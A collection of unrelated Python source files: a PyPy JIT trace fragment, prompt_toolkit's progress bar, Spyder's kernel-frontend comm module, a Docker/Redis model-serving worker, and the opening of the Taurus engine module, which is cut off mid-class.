p163 = force_token()
p164 = force_token()
p118 = getfield_gc_r(p16, descr=...)
p120 = getarrayitem_gc_r(p118, 0, descr=...)
guard_value(p120, ConstPtr(ptr121), descr=...)
p122 = getfield_gc_r(p120, descr=...)
guard_value(p122, ConstPtr(ptr123), descr=...)
p125 = getfield_gc_r(p16, descr=...)
guard_nonnull_class(p125, ..., descr=...)
p127 = getfield_gc_r(p125, descr=...)
guard_value(p127, ConstPtr(ptr128), descr=...)
p129 = getfield_gc_r(p127, descr=...)
guard_value(p129, ConstPtr(ptr130), descr=...)
p132 = call_r(ConstClass(_ll_0_alloc_with_del___), descr=...)
guard_no_exception(descr=...)
p133 = force_token()
p134 = new_with_vtable(descr=...)
setfield_gc(p134, ..., descr=...)
setfield_gc(p134, ConstPtr(null), descr=...)
setfield_gc(p48, p134, descr=...)
setfield_gc(p132, ..., descr=...)
i138 = call_i(ConstClass(_ll_1_raw_malloc_varsize_zero__Signed), 6, descr=...)
check_memory_error(i138)
setfield_gc(p132, i138, descr=...)
setfield_gc(p132, 0, descr=...)
setfield_gc(p132, ConstPtr(ptr139), descr=...)
setfield_gc(p132, -1, descr=...)
setfield_gc(p0, p133, descr=...)
call_may_force_n(ConstClass(_ll_2_gc_add_memory_pressure__Signed_pypy_module__cffi_backend_cdataobj_W_CDataNewStdPtr), 6, p132, descr=...)
guard_not_forced(descr=...)
guard_no_exception(descr=...)
i144 = int_add(i138, 0)
i146 = int_signext(i106, 2)
i147 = int_ne(i106, i146)
guard_false(i147, descr=...)
setarrayitem_raw(i144, 0, i106, descr=...)
i150 = int_add(i138, 2)
setarrayitem_raw(i150, 0, i106, descr=...)
i153 = int_add(i138, 4)
setarrayitem_raw(i153, 0, i106, descr=...)
p156 = getfield_gc_r(p48, descr=...)
i158 = getfield_raw_i(..., descr=...)
setfield_gc(p48, p49, descr=...)
setfield_gc(p134, ConstPtr(null), descr=...)
i160 = int_lt(i158, 0)
guard_false(i160, descr=...)
jump(..., descr=...)
""")
|
base.py
|
"""
Progress bar implementation on top of prompt_toolkit.
::
with ProgressBar(...) as pb:
for item in pb(data):
...
"""
import datetime
import functools
import os
import signal
import sys
import threading
import traceback
from asyncio import (
CancelledError,
get_event_loop,
new_event_loop,
set_event_loop,
sleep,
)
from typing import (
Generator,
Generic,
Iterable,
List,
Optional,
Sequence,
Sized,
TextIO,
TypeVar,
cast,
)
from prompt_toolkit.application import Application
from prompt_toolkit.application.current import get_app_session
from prompt_toolkit.filters import Condition, is_done, renderer_height_is_known
from prompt_toolkit.formatted_text import (
AnyFormattedText,
StyleAndTextTuples,
to_formatted_text,
)
from prompt_toolkit.input import Input
from prompt_toolkit.key_binding import KeyBindings
from prompt_toolkit.key_binding.key_processor import KeyPressEvent
from prompt_toolkit.layout import (
ConditionalContainer,
FormattedTextControl,
HSplit,
Layout,
VSplit,
Window,
)
from prompt_toolkit.layout.controls import UIContent, UIControl
from prompt_toolkit.layout.dimension import AnyDimension, D
from prompt_toolkit.output import ColorDepth, Output, create_output
from prompt_toolkit.styles import BaseStyle
from prompt_toolkit.utils import in_main_thread
from .formatters import Formatter, create_default_formatters
try:
import contextvars
except ImportError:
from prompt_toolkit.eventloop import dummy_contextvars as contextvars # type: ignore
__all__ = [
'ProgressBar',
]
E = KeyPressEvent
def create_key_bindings() -> KeyBindings:
"""
Key bindings handled by the progress bar.
(The main thread is not supposed to handle any key bindings.)
"""
kb = KeyBindings()
@kb.add('c-l')
def _(event: E) -> None:
event.app.renderer.clear()
@kb.add('c-c')
def _(event: E) -> None:
# Send KeyboardInterrupt to the main thread.
os.kill(os.getpid(), signal.SIGINT)
return kb
_T = TypeVar('_T')
class ProgressBar:
"""
Progress bar context manager.
Usage ::
with ProgressBar(...) as pb:
for item in pb(data):
...
:param title: Text to be displayed above the progress bars. This can be a
callable or formatted text as well.
:param formatters: List of :class:`.Formatter` instances.
:param bottom_toolbar: Text to be displayed in the bottom toolbar. This
can be a callable or formatted text.
:param style: :class:`prompt_toolkit.styles.BaseStyle` instance.
:param key_bindings: :class:`.KeyBindings` instance.
:param file: The file object used for rendering, by default `sys.stderr` is used.
:param color_depth: `prompt_toolkit` `ColorDepth` instance.
:param output: :class:`~prompt_toolkit.output.Output` instance.
:param input: :class:`~prompt_toolkit.input.Input` instance.
"""
def __init__(self,
title: AnyFormattedText = None,
formatters: Optional[Sequence[Formatter]] = None,
bottom_toolbar: AnyFormattedText = None,
style: Optional[BaseStyle] = None,
key_bindings: Optional[KeyBindings] = None,
file: Optional[TextIO] = None,
color_depth: Optional[ColorDepth] = None,
output: Optional[Output] = None,
input: Optional[Input] = None) -> None:
self.title = title
self.formatters = formatters or create_default_formatters()
self.bottom_toolbar = bottom_toolbar
self.counters: List[ProgressBarCounter[object]] = []
self.style = style
self.key_bindings = key_bindings
# Note that we use __stderr__ as default error output, because that
# works best with `patch_stdout`.
self.color_depth = color_depth
self.output = output or get_app_session().output
self.input = input or get_app_session().input
self._thread: Optional[threading.Thread] = None
self._loop = get_event_loop()
self._app_loop = new_event_loop()
self._previous_winch_handler = signal.getsignal(signal.SIGWINCH)
self._has_sigwinch = False
def __enter__(self) -> 'ProgressBar':
# Create UI Application.
title_toolbar = ConditionalContainer(
Window(FormattedTextControl(lambda: self.title), height=1, style='class:progressbar,title'),
filter=Condition(lambda: self.title is not None))
bottom_toolbar = ConditionalContainer(
Window(FormattedTextControl(lambda: self.bottom_toolbar,
style='class:bottom-toolbar.text'),
style='class:bottom-toolbar',
height=1),
filter=~is_done & renderer_height_is_known &
Condition(lambda: self.bottom_toolbar is not None))
def width_for_formatter(formatter: Formatter) -> AnyDimension:
# Needs to be passed as callable (partial) to the 'width'
# parameter, because we want to call it on every resize.
return formatter.get_width(progress_bar=self)
progress_controls = [
Window(
content=_ProgressControl(self, f),
width=functools.partial(width_for_formatter, f))
for f in self.formatters
]
self.app: Application[None] = Application(
min_redraw_interval=.05,
layout=Layout(HSplit([
title_toolbar,
VSplit(progress_controls,
height=lambda: D(
preferred=len(self.counters),
max=len(self.counters))),
Window(),
bottom_toolbar,
])),
style=self.style,
key_bindings=self.key_bindings,
refresh_interval=.3,
color_depth=self.color_depth,
output=self.output,
input=self.input)
# Run application in different thread.
def run() -> None:
set_event_loop(self._app_loop)
try:
self.app.run()
except BaseException as e:
traceback.print_exc()
print(e)
ctx: contextvars.Context = contextvars.copy_context()
self._thread = threading.Thread(target=ctx.run, args=(run, ))
self._thread.start()
# Attach WINCH signal handler in main thread.
# (Interrupt that we receive during resize events.)
self._has_sigwinch = hasattr(signal, 'SIGWINCH') and in_main_thread()
if self._has_sigwinch:
self._previous_winch_handler = signal.getsignal(signal.SIGWINCH)
self._loop.add_signal_handler(signal.SIGWINCH, self.invalidate)
return self
def __exit__(self, *a: object) -> None:
# Quit UI application.
if self.app.is_running:
self.app.exit()
# Remove WINCH handler.
if self._has_sigwinch:
self._loop.remove_signal_handler(signal.SIGWINCH)
signal.signal(signal.SIGWINCH, self._previous_winch_handler)
if self._thread is not None:
self._thread.join()
self._app_loop.close()
def __call__(self,
data: Optional[Iterable[_T]] = None,
label: AnyFormattedText = '',
remove_when_done: bool = False,
total: Optional[int] = None) -> 'ProgressBarCounter[_T]':
"""
Start a new counter.
:param label: Title text or description for this progress. (This can be
formatted text as well).
:param remove_when_done: When `True`, hide this progress bar.
:param total: Specify the maximum value if it can't be calculated by
calling ``len``.
"""
counter = ProgressBarCounter(
self, data, label=label, remove_when_done=remove_when_done, total=total)
self.counters.append(counter)
return counter
def invalidate(self) -> None:
self._app_loop.call_soon_threadsafe(self.app.invalidate)
class _ProgressControl(UIControl):
"""
User control for the progress bar.
"""
def __init__(self, progress_bar: ProgressBar, formatter: Formatter) -> None:
self.progress_bar = progress_bar
self.formatter = formatter
self._key_bindings = create_key_bindings()
def create_content(self, width: int, height: int) -> UIContent:
items: List[StyleAndTextTuples] = []
for pr in self.progress_bar.counters:
try:
text = self.formatter.format(self.progress_bar, pr, width)
except BaseException:
traceback.print_exc()
text = 'ERROR'
items.append(to_formatted_text(text))
def get_line(i: int) -> StyleAndTextTuples:
return items[i]
return UIContent(
get_line=get_line,
line_count=len(items),
show_cursor=False)
def is_focusable(self) -> bool:
return True # Make sure that the key bindings work.
def get_key_bindings(self) -> KeyBindings:
return self._key_bindings
_CounterItem = TypeVar('_CounterItem', covariant=True)
class ProgressBarCounter(Generic[_CounterItem]):
"""
An individual counter (A progress bar can have multiple counters).
"""
def __init__(self, progress_bar: ProgressBar,
data: Optional[Iterable[_CounterItem]] = None,
label: AnyFormattedText = '',
remove_when_done: bool = False,
total: Optional[int] = None) -> None:
self.start_time = datetime.datetime.now()
self.progress_bar = progress_bar
self.data = data
self.items_completed = 0
self.label = label
self.remove_when_done = remove_when_done
self._done = False
self.total: Optional[int]
if total is None:
try:
self.total = len(cast(Sized, data))
except TypeError:
self.total = None # We don't know the total length.
else:
self.total = total
def __iter__(self) -> Iterable[_CounterItem]:
try:
if self.data is not None:
for item in self.data:
yield item
self.item_completed()
finally:
self.done = True
def item_completed(self) -> None:
"""
Start handling the next item.
(Can be called manually in case we don't have a collection to loop through.)
"""
self.items_completed += 1
self.progress_bar.invalidate()
@property
def done(self) -> bool:
return self._done
@done.setter
def done(self, value: bool) -> None:
self._done = value
if value and self.remove_when_done:
self.progress_bar.counters.remove(self)
@property
def percentage(self) -> float:
if self.total is None:
return 0
else:
return self.items_completed * 100 / max(self.total, 1)
@property
def time_elapsed(self) -> datetime.timedelta:
"""
Return how much time has elapsed since the start.
"""
return datetime.datetime.now() - self.start_time
@property
def time_left(self) -> Optional[datetime.timedelta]:
"""
Timedelta representing the time left.
"""
if self.total is None or not self.percentage:
return None
else:
return self.time_elapsed * (100 - self.percentage) / self.percentage
|
frontendcomm.py
|
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""
In addition to the remote_call mechanism implemented in CommBase:
- Implements _wait_reply, so blocking calls can be made.
"""
import pickle
import socket
import sys
import threading
import time
import ipykernel
from IPython.core.getipython import get_ipython
from jupyter_client.localinterfaces import localhost
from tornado import ioloop
import zmq
from spyder_kernels.comms.commbase import CommBase, CommError
from spyder_kernels.py3compat import TimeoutError, PY2
def get_free_port():
"""Find a free port on the local machine."""
sock = socket.socket()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, b'\0' * 8)
sock.bind((localhost(), 0))
port = sock.getsockname()[1]
sock.close()
return port
def frontend_request(blocking=True, timeout=None):
"""
Send a request to the frontend.
If blocking is True, wait for the frontend's reply and return it.
"""
if not get_ipython().kernel.frontend_comm.is_open():
raise CommError("Can't make a request to a closed comm")
# Get a reply from the last frontend to have sent a message
return get_ipython().kernel.frontend_call(
blocking=blocking,
broadcast=False,
timeout=timeout)
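# A hedged usage sketch (the method name below is hypothetical; the handler returned
# by frontend_request() forwards whatever remote calls the frontend has registered):
#     reply = frontend_request(blocking=True, timeout=5).some_frontend_method()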
class FrontendComm(CommBase):
"""Mixin to implement the spyder_shell_api."""
def __init__(self, kernel):
super(FrontendComm, self).__init__()
# Comms
self.kernel = kernel
self.kernel.comm_manager.register_target(
self._comm_name, self._comm_open)
self.comm_port = None
self.register_call_handler('_send_comm_config',
self._send_comm_config)
self.comm_lock = threading.Lock()
# self.kernel.parent is IPKernelApp unless we are in tests
if self.kernel.parent:
# Create a new socket
self.context = zmq.Context()
self.comm_socket = self.context.socket(zmq.ROUTER)
self.comm_socket.linger = 1000
self.comm_port = get_free_port()
self.comm_port = self.kernel.parent._bind_socket(
self.comm_socket, self.comm_port)
if hasattr(zmq, 'ROUTER_HANDOVER'):
# Set router-handover to workaround zeromq reconnect problems
# in certain rare circumstances.
# See ipython/ipykernel#270 and zeromq/libzmq#2892
self.comm_socket.router_handover = 1
self.comm_thread_close = threading.Event()
self.comm_socket_thread = threading.Thread(target=self.poll_thread)
self.comm_socket_thread.start()
# Patch parent.close(). This function only exists in Python 3.
if not PY2:
parent_close = self.kernel.parent.close
def close():
"""Close comm_socket_thread."""
self.close_thread()
parent_close()
self.kernel.parent.close = close
def close(self, comm_id=None):
"""Close the comm and notify the other side."""
with self.comm_lock:
return super(FrontendComm, self).close(comm_id)
def _send_message(self, *args, **kwargs):
"""Publish custom messages to the other side."""
with self.comm_lock:
return super(FrontendComm, self)._send_message(*args, **kwargs)
def close_thread(self):
"""Close comm."""
self.comm_thread_close.set()
self.comm_socket.close()
self.context.term()
self.comm_socket_thread.join()
def poll_thread(self):
"""Receive messages from comm socket."""
if not PY2:
# Create an event loop for the handlers.
ioloop.IOLoop().initialize()
while not self.comm_thread_close.is_set():
self.poll_one()
def poll_one(self):
"""Receive one message from comm socket."""
out_stream = None
if self.kernel.shell_streams:
# If the message handler needs to send a reply,
# use the regular shell stream.
out_stream = self.kernel.shell_streams[0]
try:
ident, msg = self.kernel.session.recv(self.comm_socket, 0)
except zmq.error.ContextTerminated:
return
except Exception:
self.kernel.log.warning("Invalid Message:", exc_info=True)
return
msg_type = msg['header']['msg_type']
if msg_type == 'shutdown_request':
self.comm_thread_close.set()
self._comm_close(msg)
return
handler = self.kernel.shell_handlers.get(msg_type, None)
if handler is None:
self.kernel.log.warning("Unknown message type: %r", msg_type)
else:
try:
if not PY2:
import asyncio
if (not getattr(asyncio, 'run', False) or
ipykernel.__version__[0] < '6'):
# This is required for Python 3.6, which doesn't have
# asyncio.run or ipykernel versions less than 6. The
# nice thing is that ipykernel 6, which requires
# asyncio, doesn't support Python 3.6.
handler(out_stream, ident, msg)
else:
# This is needed for ipykernel 6+
asyncio.run(handler(out_stream, ident, msg))
else:
handler(out_stream, ident, msg)
except ValueError as e:
# This avoids showing an unnecessary message about expected
# coroutines.
return
except Exception:
self.kernel.log.error("Exception in message handler:",
exc_info=True)
return
sys.stdout.flush()
sys.stderr.flush()
# Flush to ensure reply is sent
if out_stream:
out_stream.flush(zmq.POLLOUT)
def remote_call(self, comm_id=None, blocking=False, callback=None,
timeout=None):
"""Get a handler for remote calls."""
return super(FrontendComm, self).remote_call(
blocking=blocking,
comm_id=comm_id,
callback=callback,
timeout=timeout)
def wait_until(self, condition, timeout=None):
"""Wait until condition is met. Returns False if timeout."""
if condition():
return True
t_start = time.time()
while not condition():
if timeout is not None and time.time() > t_start + timeout:
return False
if threading.current_thread() is self.comm_socket_thread:
# Wait for a reply on the comm channel.
self.poll_one()
else:
# Wait 10ms for a reply
time.sleep(0.01)
return True
# --- Private --------
def _wait_reply(self, call_id, call_name, timeout, retry=True):
"""Wait until the frontend replies to a request."""
def reply_received():
"""The reply is there!"""
return call_id in self._reply_inbox
if not self.wait_until(reply_received):
if retry:
self._wait_reply(call_id, call_name, timeout, False)
return
raise TimeoutError(
"Timeout while waiting for '{}' reply.".format(
call_name))
def _comm_open(self, comm, msg):
"""
A new comm is open!
"""
self.calling_comm_id = comm.comm_id
self._register_comm(comm)
self._set_pickle_protocol(msg['content']['data']['pickle_protocol'])
self._send_comm_config()
def on_outgoing_call(self, call_dict):
"""A message is about to be sent"""
call_dict["comm_port"] = self.comm_port
return super(FrontendComm, self).on_outgoing_call(call_dict)
def _send_comm_config(self):
"""Send the comm config to the frontend."""
self.remote_call()._set_comm_port(self.comm_port)
self.remote_call()._set_pickle_protocol(pickle.HIGHEST_PROTOCOL)
def _comm_close(self, msg):
"""Close comm."""
comm_id = msg['content']['comm_id']
# Send back a close message confirmation
# Fixes spyder-ide/spyder#15356
self.close(comm_id)
def _async_error(self, error_wrapper):
"""
Send an async error back to the frontend to be displayed.
"""
self.remote_call()._async_error(error_wrapper)
def _register_comm(self, comm):
"""
Remove a side effect that ipykernel has.
"""
def handle_msg(msg):
"""Handle a comm_msg message"""
if comm._msg_callback:
comm._msg_callback(msg)
comm.handle_msg = handle_msg
super(FrontendComm, self)._register_comm(comm)
def _remote_callback(self, call_name, call_args, call_kwargs):
"""Call the callback function for the remote call."""
saved_stdout_write = sys.stdout.write
saved_stderr_write = sys.stderr.write
sys.stdout.write = WriteWrapper(saved_stdout_write, call_name)
sys.stderr.write = WriteWrapper(saved_stderr_write, call_name)
try:
return super(FrontendComm, self)._remote_callback(
call_name, call_args, call_kwargs)
finally:
sys.stdout.write = saved_stdout_write
sys.stderr.write = saved_stderr_write
class WriteWrapper():
"""Wrapper to warn user when text is printed."""
def __init__(self, write, name):
self._write = write
self._name = name
self._warning_shown = False
def __call__(self, string):
"""Print warning once."""
if not self._warning_shown:
self._warning_shown = True
self._write(
"\nOutput from spyder call "
+ repr(self._name) + ":\n")
return self._write(string)
|
worker_measurements.py
|
#!/usr/bin/env python
import argparse
import docker
import time
import socket
import sys
import platform
import enum
import threading
from threading import Event
import queue
#from queue import Queue
import functools
import redis
from redis import Redis
import signal
# My imports
import exceptions
from worker_interface import WorkerServer
import models
import logging
import os
import common
NETWORK_NAME = "worker_network"
class DataBase(object):
def __init__(self, redis_server="redis-server", redis_port=6379, testing=False):
self.testing = testing
if not self.testing:
self.db = Redis(host=redis_server, port=redis_port)
logging.debug("Trying to connect to redis server")
try:
self.db.ping()
except redis.exceptions.ConnectionError as e:
logging.critical(f"Error connecting to Redis server @ {redis_server}. Is it started?")
logging.critical(e)
exit(8)
logging.debug("Connected to redis")
else:
self.db = None
def smembers(self, s):
if self.testing:
return ["resnet50_netdef_a", "resnet50_netdef_b", "resnet50_netdef_c"]
else:
return self.db.smembers(s)
def get(self, s):
if self.testing:
return 0.1 # sso
else:
return self.db.get(s)
def set(self, *args, **kwargs):
if self.testing:
pass
else:
return self.db.set(*args, **kwargs)
def pipeline(self):
return self.db.pipeline()
@functools.total_ordering
class WorkerEvent(Event):
def __init__(self, model_name, is_model_change, func, args=[], kwargs={}):
super().__init__()
self.model_name = model_name
self.is_model_change = is_model_change
self.enqueue_time = time.time()
self.execution_start_time = None
self.execution_end_time = None
self.func = func
self.args = args if type(args) is list else [args]
self.kwargs = kwargs
self.response = None
def executeInThread(self):
threading.Thread(target=self.execute).start()  # start() runs execute() on a background thread; run() would block the caller
def execute(self):
logging.debug("Starting Execution")
self.execution_start_time = time.time()
self.response = self.func(*self.args, **self.kwargs)
self.execution_end_time = time.time()
logging.debug(f"Execution Complete: {self.response}")
self.set()
return self.response
def __repr__(self):
return f"WorkerEvent<{self.func}, {self.enqueue_time}>"
# For ordering in priority queue
def __eq__(self, other):
return self.enqueue_time == other.enqueue_time
def __lt__(self, other):
return self.enqueue_time < other.enqueue_time
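# With this ordering, a PriorityQueue of WorkerEvents drains oldest-first (FIFO by enqueue_time).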
class Worker(object):
def __init__(self, flags, redis_server, redis_port, model_repo_path, host_repo_path, container_id, worker_name=None, dummy_load=True, *args, **kwargs):
self.flags = flags
# Set Up Redis database connection
self.db = DataBase(redis_server, redis_port, flags.testing)
# Set up docker connection
## Note, we might push this to be model controlled, but it is pretty integrated. Hmm
logging.debug("Connecting to docker")
try:
self.docker_client = docker.from_env()
except FileNotFoundError as e:
logging.critical("Cannot find docker file. Is it running?")
logging.critical(e)
exit(8)
logging.debug("Connected to docker")
# For labeling network and workers
self.container_id = container_id
self.container = self.docker_client.containers.get(self.container_id)
self.container_prefix = self.container_id[:5]
self.network_name = f"{self.container_prefix}-{NETWORK_NAME}"
self.network = self.docker_client.networks.create(name=f"{self.network_name}", internal=False, check_duplicate=True)
self.network.connect(self.container)
# For reporting metrics
self.worker_name = worker_name
# Model Path information
self.host_repo_path = host_repo_path # To pass to individual models
#self.model_repo_path = model_repo_path # To know what models are available
self.models_in_repo = os.listdir(model_repo_path) # Available models
self.dummy_load = dummy_load
self.max_concurrent_execs = flags.max_concurrent_execs
self.num_concurrent_execs = 0
self.current_execution_list = []
# Set up models
if self.dummy_load:
logging.debug("Using Dummy models")
Model = models.DummyModel
self.models_in_repo = [w.decode() for w in self.db.smembers(f"{common.MODEL_NAME_KEY}")]
logging.info(f"self.models_in_repo: {self.models_in_repo}")
else:
logging.debug("Using Real models")
Model = models.TFSServerModel
models.TFSServerModel.initServer(self.docker_client, self.host_repo_path, flags.worker_memory, self.network_name, arm=flags.use_arm)
common.getModelInfo(self.db)
logging.info(f"Running with {Model}")
self.models_by_name = {
model_name : Model(model_name, os.path.join(self.host_repo_path, model_name), self.docker_client, self.network_name, self.container_prefix)
for model_name in self.models_in_repo
}
self.metrics = common.Metrics(self.db, f"{common.WORKER_STAT_PREFIX}{self.worker_name}", ["requests_submitted", "requests_completed", "open_requests", "model_loads", "model_unloads"])
self.event_queue = queue.PriorityQueue()
self.processing_thread = threading.Thread(target=self.processEventQueue)
self.processing_thread.start()
self._unused_queue = queue.PriorityQueue()
def processEventQueue(self):
while True:
# (sso) TODO: uncomment the below line
#self.getStatistics()
event = self.event_queue.get()
# Check to see if event changes the models in memory
if not event.is_model_change:
# Check to see if request could potentially be serviced
if not self.models_by_name[event.model_name].isAvailable():
self._unused_queue.put(event)
continue
time_start = time.time()
event.execute()
#event.set()
# (sso) TODO: maybe only update after model loads/unloads?
def processEventQueue_new(self):
while True:
event = self.event_queue.get()
# Check if event is serviceable
if (not event.is_model_change) and (not self.models_by_name[event.model_name].isAvailable()):
# If not, then put in the unused queue to be mixed back in after model load
self._unused_queue.put(event)
continue
# We know that the event can be executed
logging.debug(f"Next Event: {event.func.__name__}")
event.executeInThread()
self.current_execution_list.append(event)
while len(self.current_execution_list) == self.max_concurrent_execs:
# Loop until some of the executions decrease in number
## That is, just stay here until something completes
self.current_execution_list = list(filter((lambda r: not r.is_set()), self.current_execution_list))
# Finally updated redis stats
self.updateRedisModelStats()
def stopWorker(self):
logging.debug("Stopping Worker")
for model in self.models_by_name.values():
model.shutdown(shutdown=True)
self.network.disconnect(self.container)
self.network.remove()
sys.exit(0)
def getStatistics(self):
stats_by_model = {
model_name : model.getStatistics()
for model_name, model in self.models_by_name.items()
}
return stats_by_model
########################
## External Functions ##
########################
@common.timing
def loadModel(self, model_name, *args, **kwargs):
logging.info(f"loadModel() requested for {model_name}")
if model_name not in self.models_by_name:
raise exceptions.ModelNotInRepoException("Model not available in model repository")
if not self._isThereFreeSpaceToLoad(model_name):
# TODO: with queued loading/unloading, this becomes more complicated
raise exceptions.NotEnoughFreeSpace("Not enough free space to load model")
load_event = WorkerEvent(model_name, is_model_change=True, func=self._loadModel, args=[model_name])
self.event_queue.put(load_event)
self.recordModelLoad(model_name)
@common.timing
def unloadModel(self, model_name, *args, **kwargs):
logging.info(f"unloadModel() requested for {model_name}")
if model_name not in self.models_by_name:
raise exceptions.ModelNotInRepoException("Model not available in model repository")
unload_event = WorkerEvent(model_name, is_model_change=True, func=self._unloadModel, args=[model_name])
self.event_queue.put(unload_event)
self.recordModelUnload(model_name)
@common.timing
def requestInference(self, inference_request, *args, **kwargs):
logging.info(f"requestInference() for model '{inference_request.model_name}'")
logging.info(f"request '{inference_request}'")
self.recordRequestEntry(inference_request.model_name)
inference_request.markAssignment()
logging.debug(f"Assigning: {inference_request}")
infer_event = WorkerEvent(inference_request.model_name,
is_model_change=False,
func=self.models_by_name[inference_request.model_name].runInference,
args=[inference_request])
self.event_queue.put(infer_event)
logging.debug(f"Waiting: {inference_request}")
infer_event.wait(common.TIMEOUT_IN_SECONDS)
self.recordRequestExit(inference_request.model_name)
if infer_event.response is None:
raise exceptions.ModelInferenceException(f"Inference model ({inference_request.model_name}) did not respond")
return infer_event.response
########################
########################
####################
## Core Functions ##
####################
@common.timing
def _loadModel(self, model_name):
model_stats = self.getModelInformation(model_name)
self.models_by_name[model_name].startModel(model_stats)
while not self._unused_queue.empty():
self.event_queue.put(self._unused_queue.get())
@common.timing
def _unloadModel(self, model_name):
self.models_by_name[model_name].stopModel()
####################
####################
#############################
## Informational Functions ##
#############################
def _isThereFreeSpaceToLoad(self, model_name, *args, **kwargs):
return True  # Short-circuit: the space-check logic below is currently disabled
if self.dummy_load:
return True
else:
running_models = [m for m in self.models_by_name.values() if m.isAvailable()]
logging.debug(running_models)
logging.info(f"Free space: {self.flags.worker_memory - sum([m.getModelSize() for m in running_models])}")
logging.info(f"Space needed: {self.models_by_name[model_name].getModelSize()}")
return (sum([m.getModelSize() for m in running_models]) + self.models_by_name[model_name].getModelSize() )<= self.flags.worker_memory
#############################
#############################
########################
## Redis interactions ##
########################
def getModelInformation(self, model_name, *args, **kwargs):
expected_exec_latency = self.db.get(f"{common.MODEL_STAT_PREFIX}{model_name}{common.DB_FIELD_SEPARATOR}avg_exec_latency")
expected_load_latency = self.db.get(f"{common.MODEL_STAT_PREFIX}{model_name}{common.DB_FIELD_SEPARATOR}avg_load_latency")
expected_unload_latency = self.db.get(f"{common.MODEL_STAT_PREFIX}{model_name}{common.DB_FIELD_SEPARATOR}avg_unload_latency")
loaded_size = self.db.get(f"{common.MODEL_STAT_PREFIX}{model_name}{common.DB_FIELD_SEPARATOR}loaded_size")
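# Hedged illustration of the key shape being read (the actual prefix and separator
# values come from common.py):
#     f"{common.MODEL_STAT_PREFIX}resnet50_netdef_a{common.DB_FIELD_SEPARATOR}avg_exec_latency"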
model_stats = {
"expected_exec_latency" : common.DUMMY_EXEC_LATENCY if expected_exec_latency is None else float(expected_exec_latency.decode()),
"expected_load_latency" : common.DUMMY_LOAD_LATENCY if expected_load_latency is None else float(expected_load_latency.decode()),
"expected_unload_latency" : common.DUMMY_UNLOAD_LATENCY if expected_unload_latency is None else float(expected_unload_latency.decode()),
"loaded_size" : 0 if loaded_size is None else float(loaded_size.decode()),
}
return model_stats
def updateRedisModelStats(self):
if not self.flags.update_redis:
return
logging.info(f"updateRedisModelStats()")
pipe = self.db.pipeline()
for model_name, model in self.models_by_name.items():
for stat_name, stat in model.getStatistics().items():
#logging.debug(f"{model_name}:{stat_name} : {stat}")
pipe.set( f"{common.MODEL_STAT_PREFIX}{model_name}{common.DB_FIELD_SEPARATOR}{stat_name}", stat )
results = pipe.execute()
return results
########################
########################
#################################
## Metrics recording Functions ##
def recordRequestEntry(self, model_requested):
self.metrics.incrementMetricBy("requests_submitted", model_requested)
self.metrics.incrementMetricBy("open_requests", model_requested, +1)
def recordRequestExit(self, model_requested):
logging.info(f"recordRequestExit({model_requested})")
self.metrics.incrementMetricBy("requests_completed", model_requested)
self.metrics.incrementMetricBy("open_requests", model_requested, -1)
def recordModelLoad(self, model_requested):
self.metrics.incrementMetricBy("model_loads", model_requested)
def recordModelUnload(self, model_requested):
self.metrics.incrementMetricBy("model_unloads", model_requested)
#################################
def getParser(add_help=True, include_parents=True):
parser = argparse.ArgumentParser(add_help=add_help,
parents=([common.getParser(add_help=False)] if include_parents else [])
)
parser.add_argument('--model_repo_path', default="/tmp/models",
help='Path to model repo')
parser.add_argument('--real_model_repo_path', default="/Users/ssogden/research/2020-project-EdgeController/triton-inference-server/docs/examples/model_repository.limited",
help='Path to model repo')
parser.add_argument('--running_in_docker', action="store_true",
help="Setting to help system determine if running within docker.")
parser.add_argument('--worker_name',
help="Name of worker")
parser.add_argument('--use_arm', action="store_true")
parser.add_argument('--testing', action="store_true")
parser.add_argument('--update_redis', action="store_true")
parser.add_argument('--max_concurrent_execs', default=1, type=int, help="Number of concurrent executions that can be started")
return parser
def main():
flags = getParser().parse_args()
flags.use_arm = (platform.processor() == 'arm64')
common.getLogger() #f"{os.path.basename(__file__).replace('.py', '')}")
# we can assume we are running in Docker basically
container_id = socket.gethostname()
logging.debug(f"container_id: {container_id}")
worker = Worker(flags,
flags.redis_server,
flags.redis_port,
flags.model_repo_path,
host_repo_path=(flags.real_model_repo_path if flags.running_in_docker else flags.model_repo_path),
container_id=container_id,
worker_name=flags.worker_name,
dummy_load=flags.dummy_load)
signal.signal(signal.SIGTERM, lambda signum, frame: worker.stopWorker())  # signal handlers receive (signum, frame)
logging.info("Worker set up. Beginning serving gRPC")
worker_server = WorkerServer.serve(worker)
logging.info("Finished serving, wrapping up")
worker.stopWorker()
if __name__ == '__main__':
main()
|
engine.py
|
"""
Main BZT classes
Copyright 2015 BlazeMeter Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import codecs
import copy
import datetime
import json
import logging
import os
import pkgutil
import re
import shutil
import sys
import threading
import time
import traceback
import uuid
from distutils.version import LooseVersion
import bzt
from bzt import ManualShutdown, get_configs_dir, TaurusConfigError, TaurusInternalException
from bzt.six import string_types, text_type, parse, reraise
from bzt.utils import load_class, BetterDict, ensure_is_dict, dehumanize_time, is_windows, is_linux
from bzt.utils import shell_exec, get_full_path, ExceptionalDownloader, get_uniq_name, HTTPClient, Environment
from .dicts import Configuration
from .modules import Provisioning, Reporter, Service, Aggregator, EngineModule
from .names import EXEC, TAURUS_ARTIFACTS_DIR, SETTINGS
from .templates import Singletone
class Engine(object):
"""
Core entity of the technology, used to coordinate whole process
:type reporters: list[Reporter]
:type services: list[Service]
:type log: logging.Logger
:type aggregator: bzt.modules.aggregator.ConsolidatingAggregator
:type stopping_reason: BaseException
"""
ARTIFACTS_DIR = "%Y-%m-%d_%H-%M-%S.%f"
def __init__(self, parent_logger):
"""
:type parent_logger: logging.Logger
"""
self.file_search_paths = []
self.services = []
self.__artifacts = []
self.reporters = []
self.artifacts_dir = None
self.log = parent_logger.getChild(self.__class__.__name__)
self.env = Environment(self.log) # backward compatibility
self.shared_env = Environment(self.log) # backward compatibility
self.config = Configuration()
self.config.log = self.log.getChild(Configuration.__name__)
self.modules = {} # available modules
self.provisioning = Provisioning()
self.aggregator = Aggregator(is_functional=False)
self.aggregator.engine = self
self.interrupted = False
